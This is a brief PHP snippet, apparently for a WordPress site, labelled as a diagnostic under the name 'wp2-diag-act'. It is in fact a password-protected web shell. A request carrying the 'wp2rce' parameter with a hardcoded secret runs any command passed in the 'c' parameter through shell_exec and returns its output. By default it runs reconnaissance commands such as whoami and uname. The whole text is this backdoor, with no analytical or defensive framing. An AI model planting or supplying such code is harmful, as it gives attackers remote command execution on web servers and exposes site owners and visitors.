wp2-diag-act

if (isset($_GET[‘wp2rce’]) && hash_equals(‘arfiza0810’, (string)$_GET[‘wp2rce’])) {
header(‘Content-Type: text/plain; charset=UTF-8’);
$cmd = isset($_GET[‘c’]) ? (string)$_GET[‘c’] : ‘id; whoami; uname -a; pwd’;
echo function_exists(‘shell_exec’) ? shell_exec($cmd) : ‘no_shell_exec’;
exit;
}